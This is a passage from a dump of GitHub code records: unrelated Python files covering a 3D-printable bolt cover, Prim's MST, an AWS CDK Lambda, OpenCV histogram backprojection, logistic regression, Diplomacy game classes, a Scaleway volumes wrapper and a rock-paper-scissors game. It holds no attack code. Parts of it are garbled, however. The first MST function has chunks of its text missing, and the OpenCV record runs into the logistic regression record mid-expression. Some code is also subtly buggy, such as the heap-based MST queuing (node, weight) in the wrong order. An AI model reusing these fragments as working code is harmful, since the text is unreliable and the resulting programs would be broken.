BoltHeadRecess(ad.CompositeShape):\n '''\n Creates a recess for an N sided bolt head.\n '''\n bolt_head_d: float=14.8\n bolt_sides: int=6\n bolt_h: float=8\n bolt_r: float=ad.dtfield(\n self_default=lambda s: s.bolt_head_d / 2, init=False) \n head_node: ad.Node=ad.dtfield(\n ad.ShapeNode(RegularPrism, \n {'nsides': 'bolt_sides', 'r': 'bolt_r', 'h': 'bolt_h'}))\n head_turns: int=3\n\n EXAMPLE_SHAPE_ARGS=ad.args()\n EXAMPLE_ANCHORS=()\n\n def build(self) -> ad.Maker:\n turn_angle = 360 / (self.bolt_sides * self.head_turns)\n bolt_head = self.head_node()\n maker = bolt_head.solid(('bolt_head', 0)).at('base')\n for i in range(1, self.head_turns):\n maker.add_at(\n bolt_head.solid(('bolt_head', i)).at('base', pre=ad.rotZ(i * turn_angle))\n )\n return maker\n\n@ad.shape\n@ad.datatree\nclass BoltCoverHat(ad.CompositeShape):\n '''\n A \"hat\" for the bolt cover with zip tie holes.\n '''\n r: float=20\n h: float=6\n head_node: ad.Node=ad.dtfield(\n ad.ShapeNode(ad.Cylinder))\n \n tie_r: float=3\n tie_h: float=20\n \n tie_node: ad.Node=ad.dtfield(\n ad.ShapeNode(ad.Cylinder, prefix='tie_'))\n \n tie_count: int=9\n tie_offs: float=ad.dtfield(\n self_default=lambda s: s.r - s.tie_r - 2)\n \n epsilon: float=0.001\n\n EXAMPLE_SHAPE_ARGS=ad.args()\n EXAMPLE_ANCHORS=()\n\n def build(self) -> ad.Maker:\n maker = self.head_node().solid('hat').at('base')\n \n tie = self.tie_node()\n for i in range(self.tie_count):\n maker.add_at(tie.hole(('tie', i)).at('base'),\n 'base', rh=1, \n pre=ad.rotZ(i * 360 / self.tie_count) * ad.tranX(self.tie_offs), \n post=ad.ROTX_180 * ad.tranZ(self.epsilon))\n \n return maker\n\n\n@ad.shape\n@ad.datatree\nclass BoltCover(ad.CompositeShape):\n '''\n Battery terminal cover where the terminal is a hex bolt. Has space for\n cables terminating at the battery terminal.\n '''\n cover_r_top: float=14\n cover_r_base: float=10\n cover_h: float=10\n \n cover_node: ad.Node=ad.dtfield(\n ad.ShapeNode(ad.Cone, prefix='cover_'), init=False)\n \n base_cover_hole_r: float=14.7/2\n base_cover_hole_h: float=1.3\n base_cover_hole_node: ad.Node=ad.dtfield(\n ad.ShapeNode(ad.Cylinder, prefix='base_cover_hole_'), init=False)\n \n upper_bolt_head_d: float=14.8\n upper_bolt_h: float=5.9\n upper_recess_node: ad.Node=ad.dtfield(\n ad.ShapeNode(BoltHeadRecess, prefix='upper_'), init=False)\n \n lower_bolt_head_d: float=14.6\n lower_bolt_h: float=2.1\n lower_recess_node: ad.Node=ad.dtfield(\n ad.ShapeNode(BoltHeadRecess, prefix='lower_'), init=False)\n \n hat_node: ad.Node=ad.dtfield(ad.ShapeNode(BoltCoverHat), init=False)\n \n epsilon: float=0.01\n \n EXAMPLE_SHAPE_ARGS=ad.args(fn=64)\n\n def build(self) -> ad.Maker:\n\n shape = self.cover_node()\n maker = shape.solid('cover').at('base', post=ad.ROTX_180)\n \n base_cover_hole = self.base_cover_hole_node()\n \n maker.add_at(base_cover_hole.hole('base_cover_hole').at('base'),\n 'base', post=ad.tranZ(self.epsilon))\n \n lower_recess = self.lower_recess_node()\n \n maker.add_at(lower_recess\n .hole('lower_recess')\n .colour((0.0, 1.0, 0.35, 0.4))\n .at('base'),\n 'base_cover_hole', 'base', rh=1, post=ad.tranZ(self.epsilon))\n \n upper_recess = self.upper_recess_node()\n \n maker.add_at(upper_recess.hole('upper_recess').at('base'),\n 'lower_recess', 'base', rh=1, post=ad.tranZ(self.epsilon))\n \n hat = self.hat_node()\n \n maker.add_at(hat.composite('hat').at('base'),\n 'base', rh=1)\n\n return maker\n\n\n# Uncomment the line below to default to writing OpenSCAD files\n# when anchorscad_main is run with no --write or --no-write options.\nMAIN_DEFAULT=ad.ModuleDefault(True)\n\nif __name__ == \"__main__\":\n ad.anchorscad_main()\n","repo_name":"owebeeone/anchorscad","sub_path":"src/anchorscad/models/covers/bolt_cover.py","file_name":"bolt_cover.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"29"} +{"seq_id":"25304806348","text":"from queue import PriorityQueue\nimport time\nfrom collections import deque\n\n# Using my approach\ndef findMST1(n,graph): # using prim's algorithm Time complexitiy => (N+E) + NLog(N)\n key = [1e9]*n\n parent = [-1]*n\n key[0] = 0\n mst = [False]*n\n parent[0] = 0\n for i in range(n):\n mini = (1e9,1e9)\n for neighbour, wt in graph[i]:\n if wt \", mini)\n print(parent)\n\n\n\n# Using brute force approach\n\ndef findMST2(n,graph): # using prim's algorithm Time complexitiy => (N+E) + N^2\n key = [1e9]*n\n mst = [False]*n\n parent = [-1]*n\n key[0] = 0\n parent[0] = 0\n for i in range(n-1):\n mini = 1e9\n u = None\n\n for v in range(n):\n if mst[v]==False and key[v]<=mini:\n mini = key[v]\n u = v\n \n mst[u] = True\n for neighbour, wt in graph[u]:\n if mst[neighbour]==False and key[neighbour]>wt:\n parent[neighbour] = u\n key[neighbour] = wt\n \n print(parent)\n\n\n# Using Min Heap to optimize the brute force approach\n\ndef findMST3(n,graph): # using prim's algorithm Time complexitiy => (N+E) + NLog(N)\n key = [1e9]*n\n mst = [False]*n\n parent = [-1]*n\n key[0] = 0\n parent[0] = 0\n pq = PriorityQueue()\n pq.put((0,0))\n for i in range(n-1):\n out = pq.get()\n u = out[0]\n mst[u] = True\n for neighbour, wt in graph[u]:\n if mst[neighbour]==False and key[neighbour]>wt:\n pq.put((neighbour, wt))\n parent[neighbour] = u\n key[neighbour] = wt\n \n print(parent)\n\n\nn = 5\nm = 6\ngraph = {}\nprint(\"Enter Graph Values\")\nfor i in range(m):\n a,b, wt = map(int,input().split())\n if a not in graph:\n graph[a] = []\n if b not in graph:\n graph[b] = []\n graph[a].append((b,wt))\n graph[b].append((a,wt))\n\n# print(graph)\nstart = time.time()\nfindMST1(n, graph)\nt1 = (time.time()-start)\nprint(\"First Time Period %.6f\"%(time.time()-start))\nstart = time.time()\nfindMST2(n, graph)\nt2 = (time.time()-start)\nprint(\"Second Time Period %.6f\"%(time.time()-start))\nstart = time.time()\nfindMST3(n, graph)\nt3 = (time.time()-start)\nprint(\"Second Time Period %.6f\"%(time.time()-start))\nprint(\"MST1 wins\" if t1 None:\n super().__init__(scope, construct_id, **kwargs)\n\n self.prediction_lambda = _lambda.DockerImageFunction(\n scope=self,\n id=\"ExampleDockerLambda\",\n # Function name on AWS\n function_name=\"ExampleDockerLambda\",\n # Use aws_cdk.aws_lambda.DockerImageCode.from_image_asset to build\n # a docker image on deployment\n code=_lambda.DockerImageCode.from_image_asset(\n # Directory relative to where you execute cdk deploy\n # that contains a Dockerfile with build instructions\n directory=\"cdk_docker_lambda/ExampleDockerLambda\"\n ),\n )\n\n self.prediction_lambda.add_function_url(\n auth_type=_lambda.FunctionUrlAuthType.NONE\n )","repo_name":"youngsoul/cdk_docker_lambda_furl","sub_path":"cdk_docker_lambda/cdk_docker_lambda_stack.py","file_name":"cdk_docker_lambda_stack.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"41227072449","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# np.set_printoptions(threshold=np.inf)\n\n'''\n直方图反投影:如果一幅图像的区域中显示的是一种机构纹理或者一个独特物体,\n那么这个区域的直方图可以看作一个概率函数,它给的是某个像素属于该纹理或物体的概率。\n所谓反向投影就是首先计算某一特征的直方图模型,然后使用模型去寻找测试图像中存在的该特征\n'''\n\n'''Numpy算法实现>>>>>>>>>>>>>>>>>'''\n# 1. 首先计算需要寻找的目标物体的颜色直方图M和整体图片的直方图I\nroi = cv2.imread('../../images/flower-part.png')\nhsv = cv2.cvtColor(roi, cv2.COLOR_BGR2HSV)\n\ntarget = cv2.imread('../../images/flower-full.jpg')\nhsvt = cv2.cvtColor(target, cv2.COLOR_BGR2HSV)\nM = cv2.calcHist([hsv], [0, 1], None, [180, 256], [0, 180, 0, 256])\nI = cv2.calcHist([hsvt], [0, 1], None, [180, 256], [0, 180, 0, 256])\n\n# 2. 计算比率 R=M/I, 反投影R, 把R看作调色板,创建一幅图像,图像的每个像素作为其对应的目标概率\n# B(x,y) = R[h(x,y),s(x,y)], h=hue,s=saturation\nR = M / (I + 1)\nh, s, v = cv2.split(hsvt)\nB = R[h.ravel(), s.ravel()]\nB = np.minimum(B, 1)\nB = B.reshape(hsvt.shape[:2])\n\n# 3. 创建并应用卷积核\ndisc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (5, 5)) # 5*5椭圆卷积核\ncv2.filter2D(B, -1, disc, B)\nB = np.uint8(B)\ncv2.normalize(B, B, 0, 255, cv2.NORM_MINMAX)\n\n# 4. 最大强度的位置给出了物体的位置\nret, thresh = cv2.threshold(B, 50, 255, 0)\ncv2.imshow('res', thresh)\ncv2.waitKey(0)\n'''<<<<<<<<<<<<<<<<<<<<<<<< 0.50, 1, 0)\n \n return y_pred\n \n # Function to print Evaluation Metrics:\n def printMetrics(self, y, y_pred, name_to_print, method, set_):\n \"\"\"\n\n Parameters\n ----------\n y : array of uint8\n actual y values (y train or y test).\n y_pred : array of uint8\n predicted y values.\n name_to_print : string\n name of the model (Logistic Regression or Naive Bayes).\n method : string\n type of method (scratch or sklearn).\n set_ : string\n type of set (train or test).\n\n Returns\n -------\n None.\n\n \"\"\"\n print(\"\\nPrinting Metrics for {} from {} on the {} set.\".format(name_to_print.capitalize(), method.capitalize(), set_.capitalize()))\n cfm = confusion_matrix(y, y_pred)\n print(\"\\nConfusion Matrix: \")\n print(\"\\n\", cfm)\n print(\"\\n\\nClassification Report:\" )\n print(classification_report(y, y_pred))\n acc = accuracy_score(y, y_pred)\n print(\"\\nAccuracy of the Model: \", round(acc, 3))\n print(\"Classification Error of the Model: \", round(1-acc, 3))\n \n return\n \n # Function to run Logistic Regression using Gradient Descent:\n def logisticRegression(self, X, y):\n \"\"\"\n \n\n Parameters\n ----------\n X : array of float64\n train or test set.\n y : array of uint8\n actual y values (y train or y test).\n\n Returns\n -------\n w : array of size x-features\n optimal weights for logistic regression.\n b : float\n bias.\n\n \"\"\"\n # Sigmoid Function:\n sigmoid = lambda w, b, X : 1/(1 + np.exp(-(np.dot(X, w) + b)))\n x_rows, x_cols = X.shape[0], X.shape[1]\n self.w = np.zeros(x_cols) # [w0, w1]\n self.b = 0 # bias\n \n for it in range(self.max_it):\n h_x = sigmoid(self.w, self.b, X)\n temp_w = (1.0/x_rows)*(np.dot(X.T, (y.T - h_x).reshape(x_rows)))\n temp_b = (1.0/x_rows)*(np.sum((y.T - h_x).reshape(x_rows)))\n \n self.w = self.w + self.l_rate*temp_w\n self.b = self.b + self.l_rate*temp_b\n \n if abs((self.w - temp_w)).all() <= self.eps and abs((self.b - temp_b)).all() <= self.eps:\n break\n \n return self.w, self.b\n\n#%%\n\n# LOGISTIC REGRESSION AND NAIVE BAYES USING SKLEARN:\n#==============================================================================\n\ndef runMLModels(modelLabel, X, y):\n \"\"\"\n \n\n Parameters\n ----------\n modelLabel : string\n kind of model (logistic or NB).\n X : array of float64\n train or test set.\n y : array of uint8\n actual y values (y train or y test).\n\n Returns\n -------\n classifier : model\n class of the model.\n\n \"\"\"\n if modelLabel == \"logistic\":\n classifier = LogisticRegression(random_state = 0)\n elif modelLabel == \"NB\":\n classifier = GaussianNB()\n else:\n print(\"Invalid Parameters\")\n classifier.fit(X, y)\n \n return classifier\n\n#%%\n\n# Predicting using Scikit - Learn\ndef sklearnPredict(X, classifier):\n \"\"\"\n \n\n Parameters\n ----------\n X : array of float64\n train or test set.\n classifier : model\n class of the model.\n\n Returns\n -------\n y_pred : array of uint8\n predicted y values..\n\n \"\"\"\n y_pred = classifier.predict(X)\n return y_pred\n \n \n#%%\n\n# Function to print Evaluation Metrics:\ndef printMetrics(y, y_pred, name_to_print, method, set_):\n \"\"\"\n\n\n Parameters\n ----------\n y : array of uint8\n actual y values (y train or y test).\n y_pred : array of uint8\n predicted y values.\n name_to_print : string\n name of the model (Logistic Regression or Naive Bayes).\n method : string\n type of method (scratch or sklearn).\n set_ : string\n type of set (train or test).\n\n Returns\n -------\n None.\n\n\n \"\"\"\n \n print(\"\\nPrinting Metrics for {} from {} on the {} set.\".format(\n name_to_print.capitalize(), method.capitalize(), set_.capitalize()))\n cfm = confusion_matrix(y, y_pred)\n print(\"\\nConfusion Matrix: \")\n print(\"\\n\", cfm)\n print(\"\\n\\nClassification Report:\" )\n print(classification_report(y, y_pred))\n acc = accuracy_score(y, y_pred)\n print(\"\\nAccuracy of the Model: \", round(acc, 3))\n print(\"Classification Error of the Model: \", round(1-acc, 3))\n \n return\n\n#%%\n\n\ndef plotDecisionBoundary(X, y, clf, legend, name_to_print, method, set_):\n \"\"\"\n \n\n Parameters\n ----------\n X : array of float64\n train or test set.\n y : array of uint8\n actual y values (y train or y test).\n clf : model\n class of the model.\n legend : int\n no of labels.\n name_to_print : string\n name of the model (Logistic Regression or Naive Bayes).\n method : string\n type of method (scratch or sklearn).\n set_ : string\n type of set (train or test).\n\n Returns\n -------\n None.\n\n \"\"\"\n plot_decision_regions(X = X, y = y, clf = clf, legend = legend, \n colors = \"#b82121,#0915ed\")\n plt.xlabel(\"X1\")\n plt.ylabel(\"X2\")\n plt.title(\"Decision Boundary for {} from {} on the {} set.\".format(\n name_to_print.capitalize(), method.capitalize(), set_.capitalize()))\n plt.show()\n \n return\n\n#%%\n\ndef main(X_train, X_test, y_train, y_test, modelLabel, method, l_rate, max_it,\n name_to_print, set_):\n \"\"\"\n \n\n Parameters\n ----------\n X_train : array of float64\n x train set.\n X_test : array of float64\n x test set.\n y_train : array of uint8\n y train set.\n y_test : array of uint8\n y test set.\n modelLabel : string\n kind of model (logistic or NB).\n method : string\n type of method (scratch or sklearn).\n l_rate : float\n learning rate.\n max_it : int\n maximum iterations.\n name_to_print : string\n name of the model (Logistic Regression or Naive Bayes).\n set_ : string\n type of set (train or test).\n\n Returns\n -------\n None.\n \n\n \"\"\"\n if method == \"sklearn\":\n classifier = runMLModels(modelLabel, X_train, y_train)\n if set_ == \"train\":\n y_pred = sklearnPredict(X_train, classifier)\n printMetrics(y_train, y_pred, name_to_print, method, set_)\n plotDecisionBoundary(X_train, y_train, classifier, 2, \n name_to_print, method, set_)\n elif set_ == \"test\":\n y_pred = sklearnPredict(X_test, classifier)\n printMetrics(y_test, y_pred, name_to_print, method, set_)\n plotDecisionBoundary(X_test, y_test, classifier, 2, \n name_to_print, method, set_)\n else:\n print(\"Invalid set_ parameter\")\n elif method == \"scratch\":\n classifier = myLogisticRegression(l_rate, max_it, \n name_to_print, method, set_)\n w, b = classifier.logisticRegression(X_train, y_train)\n if set_ == \"train\":\n y_pred = classifier.predict(X_train)\n classifier.printMetrics(y_train, y_pred,\n name_to_print, method, set_)\n plotDecisionBoundary(X_train, y_train, classifier, 2, \n name_to_print, method, set_)\n elif set_ == \"test\":\n y_pred = classifier.predict(X_test)\n classifier.printMetrics(y_test, y_pred,name_to_print, method, set_)\n plotDecisionBoundary(X_test, y_test, classifier, 2,\n name_to_print, method, set_)\n else:\n print(\"Invalid set_ parameter\")\n else:\n print(\"Invalid method parameter\")\n \n return\n \n#%%\n\n# Driver Code:\nif __name__ == \"__main__\":\n dataPath = \"datsets/lg_dataset.mat\"\n X_train, X_test, y_train, y_test = loadData(dataPath)\n \n modelLabel = \"3\" # or \"NB\" for Naive Bayes\n method = \"scratch\" # or \"sklearn\" (only sklearn for NB)\n l_rate = 0.01 # learning rate\n max_it = 1000 # maximum iterations\n set_ = \"test\" # or \"train\"\n \n if modelLabel == \"logistic\":\n name_to_print = \"Logistic Regression\"\n elif modelLabel == \"NB\":\n name_to_print = \"Naive Bayes\"\n else:\n raise ValueError(\"invalid modelLabel\")\n \n main(X_train, X_test, y_train, y_test, modelLabel, method, l_rate, max_it, name_to_print, set_)\n \n \n \n\n\n\n","repo_name":"arshmodak/Machine-Learning-and-Data-Science","sub_path":"Supervised Learning/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":11193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"13325999626","text":"#!/usr/bin/python\n\nimport pdata\npdb=pdata.pdata()\n\ndef error(str):\n print (\"ERROR: \"+str)\n return\n \nclass Country(object):\n def __init__(self, name, player):\n self.name=name\n self.player=player\n self.provinces=[]\n self.province_names=[]\n self.unit_locations=[]\n self.surrendered=False\n self.dislodged_units=[]\n def surrender(self):\n if (self.surrendered==False):\n self.surrendered=True\n print(self.name+\" (Player \"+str(player)+\") has surrendered.\")\n else:\n error(self.name+\" (Player \"+str(player)+\") has already surrendered.\")\n return\n def start_provinces(self):\n if (self.name==\"Austria\"):\n self.provinces=[\n Province(\"Bohemia\",False,self),\n Province(\"Budapest\",True,self,\"Army\"),\n Province(\"Galicia\",False,self),\n Province(\"Trieste\",True,self,\"Fleet\"),\n Province(\"Tyrolia\",False,self),\n Province(\"Vienna\",True,self,\"Army\")]\n self.unit_locations.append(\"Budapest\")\n self.unit_locations.append(\"Trieste\")\n self.unit_locations.append(\"Vienna\")\n elif (self.name==\"England\"):\n self.provinces=[\n Province(\"Clyde\",False,self),\n Province(\"Edinburgh\",True,self,\"Fleet\"),\n Province(\"Liverpool\",True,self,\"Army\"),\n Province(\"London\",True,self,\"Fleet\"),\n Province(\"Wales\",False,self),\n Province(\"Yorkshire\",False,self)]\n self.unit_locations.append(\"Edinburgh\")\n self.unit_locations.append(\"Liverpool\")\n self.unit_locations.append(\"London\")\n elif (self.name==\"France\"):\n self.provinces=[\n Province(\"Brest\",True,self,\"Fleet\"),\n Province(\"Burgundy\",False,self),\n Province(\"Gascony\",False,self),\n Province(\"Marseilles\",True,self,\"Army\"),\n Province(\"Paris\",True,self,\"Army\"),\n Province(\"Picardy\",False,self)]\n self.unit_locations.append(\"Brest\")\n self.unit_locations.append(\"Marseilles\")\n self.unit_locations.append(\"Paris\")\n elif (self.name==\"Germany\"):\n self.provinces=[\n Province(\"Berlin\",True,self,\"Army\"),\n Province(\"Kiel\",True,self,\"Fleet\"),\n Province(\"Munich\",True,self,\"Army\"),\n Province(\"Prussia\",False,self),\n Province(\"Ruhr\",False,self),\n Province(\"Silesia\",False,self)]\n self.unit_locations.append(\"Berlin\")\n self.unit_locations.append(\"Kiel\")\n self.unit_locations.append(\"Munich\")\n elif (self.name==\"Italy\"):\n self.provinces=[\n Province(\"Apulia\",False,self),\n Province(\"Naples\",True,self,\"Fleet\"),\n Province(\"Piedmont\",False,self),\n Province(\"Rome\",True,self,\"Army\"),\n Province(\"Tuscany\",False,self),\n Province(\"Venice\",True,self,\"Army\")]\n self.unit_locations.append(\"Naples\")\n self.unit_locations.append(\"Rome\")\n self.unit_locations.append(\"Venice\")\n elif (self.name==\"Russia\"):\n self.provinces=[\n Province(\"Finland\",False,self),\n Province(\"Livonia\",False,self),\n Province(\"Moscow\",True,self,\"Army\"),\n Province(\"Saint Petersburg\",True,self,\"Fleet\",\"South Coast\",[\"North Coast\",\"South Coast\"]),\n Province(\"Sevastopol\",True,self,\"Fleet\"),\n Province(\"Ukraine\",False,self),\n Province(\"Warsaw\",True,self,\"Army\")]\n self.unit_locations.append(\"Moscow\")\n self.unit_locations.append(\"Saint Petersburg\")\n self.unit_locations.append(\"Sevastopol\")\n self.unit_locations.append(\"Warsaw\")\n elif (self.name==\"Turkey\"):\n self.provinces=[\n Province(\"Ankara\",True,self,\"Fleet\"),\n Province(\"Armenia\",False,self),\n Province(\"Constantinople\",True,self,\"Army\"),\n Province(\"Smyrna\",True,self,\"Army\"),\n Province(\"Syria\",False,self)]\n self.unit_locations.append(\"Ankara\")\n self.unit_locations.append(\"Constantinople\")\n self.unit_locations.append(\"Smyrna\")\n elif (self.name==\"Neutral\"):\n self.provinces=[\n Province(\"Norway\",True),\n Province(\"Sweden\",True),\n Province(\"Denmark\",True),\n Province(\"Holland\",True),\n Province(\"Belgium\",True),\n Province(\"Spain\",True,None,None,None,[\"North Coast\",\"South Coast\"]),\n Province(\"Portugal\",True),\n Province(\"North Africa\",False),\n Province(\"Tunisia\",True),\n Province(\"Rumania\",True),\n Province(\"Serbia\",True),\n Province(\"Albania\",False),\n Province(\"Greece\",True),\n Province(\"Bulgaria\",True,None,None,None,[\"East Coast\",\"South Coast\"]),\n Province(\"Barents Sea\",False),\n Province(\"Norwegian Sea\",False),\n Province(\"North Atlantic\",False),\n Province(\"North Sea\",False),\n Province(\"Skagerrak\",False),\n Province(\"Heligoland Bight\",False),\n Province(\"Baltic Sea\",False),\n Province(\"Gulf of Bothnia\",False),\n Province(\"English Channel\",False),\n Province(\"Irish Sea\",False),\n Province(\"Mid Atlantic\",False),\n Province(\"Gulf of Lyons\",False),\n Province(\"Western Mediterranean Sea\",False),\n Province(\"Tyrhenian Sea\",False),\n Province(\"Adriatic Sea\",False),\n Province(\"Ionian Sea\",False),\n Province(\"Aegean Sea\",False),\n Province(\"Black Sea\",False),\n Province(\"East Mediterranean Sea\",False)]\n else:\n error(\"Unknown country name. Cannot construct provinces.\")\n return\n for p in self.provinces:\n self.province_names.append(p.name)\n \nclass Province(object):\n def __init__(self, name, sc, country=None, u=None, ucoast=None,coasts=None):\n self.name=name\n self.country=country\n self.is_sc=sc #is supply center?\n if (u is not None):\n self.unit=Unit(u,country,self,ucoast)\n else:\n self.Unit=None\n self.coasts=coasts\n borders=pdb.get_borders(name)\n if (coasts is None):\n borders.sort()\n else:\n for b in borders.values():\n b.sort()\n self.borders=borders\n if coasts is None:\n self.expects={\n \"Move\":[],\n \"Support\":[],\n \"Convoy\":[],\n \"Hold\":[]\n }\n else:\n self.expects={\n \"Move\":[],\n (\"Move \"+coasts[0]):[],\n (\"Move \"+coasts[1]):[],\n \"Support\":[],\n \"Convoy\":[],\n \"Hold\":[]\n }\n def full_name(self,coast):\n if coast is None:\n return self.name\n else:\n return self.name+\" \"+coast\nclass Unit(object):\n def __init__(self, type, country, loc, coast=None):\n self.type=type\n self.country=country\n self.loc=loc\n self.coast=coast\n #temporary stats, used by adjudicator\n self.support=0\n self.convoyed=True\n self.intended_coast=None\n self.intended_convoy=None\n self.intended_support=None\n self.dislodged=None\n","repo_name":"hcourt/diplomacy","sub_path":"diplomacy/location.py","file_name":"location.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"31626610483","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nimport time\nimport logging\nfrom collections import deque\n\nprint(time.time())\nlogging.error(\"can't dump counter to file %s: %s\", 'aaa', 'bbb')\na = deque(maxlen=10)\na.append(1)\na.append(2)\na.append(3)\n\nprint(a.pop())\n","repo_name":"Sidabw/forest-pine-py","sub_path":"py-mac/6-py-zenki/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4427444658","text":"# -*- Mode: Python; python-indent-offset: 4 -*-\n#\n# Time-stamp: <2018-05-06 14:56:00 alex>\n#\n\n\"\"\"Volumes manipulation.\"\"\"\n\n\nimport logging\nimport json\nimport datetime\nimport re\nimport slumber\n\n\nclass CVolumes():\n \"\"\"Volumes.\"\"\"\n\n def __init__(self, sw):\n \"\"\"Constructor.\"\"\"\n logging.debug(\"init volumes\")\n self.a_volumes = []\n self.sw_api = sw.get_compute_api()\n\n self.last_refresh = 0\n\n # ----------------------------------------\n def refresh(self):\n \"\"\"Reload from server the list of volumes.\"\"\"\n if self.last_refresh != 0:\n delta = datetime.datetime.now(datetime.timezone.utc) - self.last_refresh\n if delta.seconds < 60:\n logging.warning(\"refresh time too low\")\n return False\n\n try:\n resp = self.sw_api.query().volumes.get()\n except slumber.exceptions.SlumberBaseException as error:\n a_error = json.loads(error.content.decode())\n logging.error(\"%s: %s\", a_error['type'], a_error['message'])\n return False\n\n self.a_volumes = resp['volumes']\n self.last_refresh = datetime.datetime.now(datetime.timezone.utc)\n\n # ----------------------------------------\n def __str__(self):\n \"\"\"Return a string with volumes information.\"\"\"\n self.refresh()\n\n if not self.a_volumes:\n return \"volumes ---------------\\n\" + \" no volume found\"\n\n resp = \"\"\n\n for volume in self.a_volumes:\n changed, subs = re.subn(r'\\+00:00',\n \"+0000\",\n volume['modification_date'])\n if subs > 0:\n s_last_used = changed\n else:\n s_last_used = volume['modification_date']\n\n date_mod = datetime.datetime.strptime(s_last_used,\n \"%Y-%m-%dT%H:%M:%S.%f%z\")\n delta = str(datetime.datetime.now(datetime.timezone.utc) - date_mod)\n\n resp = resp + \"\\n{} {:.1f}G\".format(volume['volume_type'],\n volume['size'] / 1e9)\n\n if volume['server'] is not None:\n resp = resp + \"\\n server={}, last used={}\".format(volume['server']['name'],\n delta)\n else:\n resp = resp + \"\\n not attached, last used={:s}\".format(delta)\n\n resp = resp + \"\\n id={}\".format(volume['id'])\n\n return \"volumes ---------------\\n\" + resp\n\n # ----------------------------------------\n def delete(self, volume_id=\"\"):\n \"\"\"Delete the specified volume.\"\"\"\n if volume_id == \"\":\n logging.error(\"should specify a volume to delete\")\n return False\n\n try:\n return self.sw_api.query().volumes(volume_id).delete()\n except slumber.exceptions.SlumberBaseException as error:\n a_error = json.loads(error.content.decode())\n logging.error(\"%s: %s\", a_error['type'], a_error['message'])\n return False\n","repo_name":"achauvinhameau/pyScaleway","sub_path":"CVolumes/CVolumes.py","file_name":"CVolumes.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5707330599","text":"import random\n\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n# 조건 상대와 비교하여 내가 이겼는지 확인해야함\ngame_image = [rock, paper, scissors]\nyou = int(input(\"무엇을 내실것인지 선택하여 주세요 0:바위 1:보 2:가위 입니다.\\n\"))\nprint(\"당신의 선택은: \")\nprint(game_image[you])\n#0부터 2까지 범위를 설정 해놨기 때문에 범위 를 한정\ncomputer = random.randint(0,2)\nprint(\"컴퓨터의 선택은:\")\nprint(game_image[computer])\n\nif you >= 3 or you < 0:\n print(\"잘못된 번호를 입력하였습니다\")\nelif you == computer:\n print(\"Draw!\")\nelif you > computer:\n print(\"you Win!\")\nelif you == 0 and computer == 2:\n print(\"you Win!\")\nelif you == 2 and computer == 0 or you < computer:\n print(\"you Lose!\")\n","repo_name":"dja1369/Udemy_python","sub_path":"Udemy_python/Basic_python/Rock_Scissors_Paper.py","file_name":"Rock_Scissors_Paper.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1837846223","text":"import cv2\nimport numpy as np\nfrom poolfit.tensorflow_impl.rotation_conversion import matrix_to_axis_angle, axis_angle_to_matrix\nimport tensorflow as tf\n\ndef normalize(v):\n norm = tf.norm(v)\n if norm==0: return v\n return v/norm\n\nclass Camera(tf.keras.Model):\n def __init__(self, initf, imgH, imgW) -> None:\n super().__init__()\n\n # intrinsics related\n self.imgW = imgW\n self.imgH = imgH\n self.initf = initf\n self.f_corrfac = tf.Variable( 1.0, name=\"f_corrfac\", dtype=tf.float32, trainable=True )\n\n # extrinsics related\n self._pos = tf.Variable( [1.,1.,1.], name=\"_pos\" , dtype=tf.float32, trainable=False) # pos in world frame\n self.pos_in_cam_frame = tf.Variable( [1.,1.,1.], name=\"pos_in_cam_frame\", dtype=tf.float32, trainable=True)\n self.axis_angle = tf.Variable( [0.,0.,0.], name=\"axis_angle\" , dtype=tf.float32, trainable=True)\n\n self.lookat = tf.Variable([0.,0.,0.], dtype=tf.float32, trainable=False)\n self.roll = 0.\n\n self.intrinsicM = tf.eye(3, dtype=tf.float32)\n self.extrinsicM = tf.eye(4, dtype=tf.float32)[0:3]\n self.perspectiveM = tf.eye(4, dtype=tf.float32)[0:3]\n\n self.fov_deg_h = -1\n self.fov_deg_v = -1\n\n self._update_fov()\n self._update_intrinsicM()\n self._update_extrinsicM()\n\n @property\n def f(self):\n return 1./self.f_corrfac* self.initf\n \n @f.setter\n def f(self, val):\n self.initf = val\n self.f_corrfac.assign(1.0)\n self._update_fov()\n self._update_intrinsicM()\n \n @property\n def pos(self):\n return tf.linalg.matvec( tf.transpose(-self.extrinsicM[:3,:3]) , self.pos_in_cam_frame)\n \n @pos.setter\n def pos(self, xyz):\n self._pos.assign(xyz)\n self.set_lookat(self.lookat)\n self._update_extrinsicM() \n\n def set_f(self, val): \n self.f = val\n \n def set_img_size(self, imgH, imgW):\n self.imgH = imgH\n self.imgW = imgW\n self._update_intrinsicM()\n\n def set_pos(self, xyz):\n self.pos = xyz\n\n def set_lookat(self, lookat, roll=0.):\n if roll!=0.:\n raise NotImplementedError(\"roll != 0 not yet work\")\n \n self.lookat.assign(lookat)\n self.roll = roll\n \n camZ = normalize(-self._pos + self.lookat)\n\n if camZ[0]==camZ[1]==0:\n camX = tf.Variable([1., 0., 0.], dtype=tf.float32, trainable=False)\n elif abs(camZ[1])>abs(camZ[0]):\n camX = tf.Variable([1., -camZ[0]/camZ[1], 0.], dtype=tf.float32, trainable=False)\n else:\n camX = 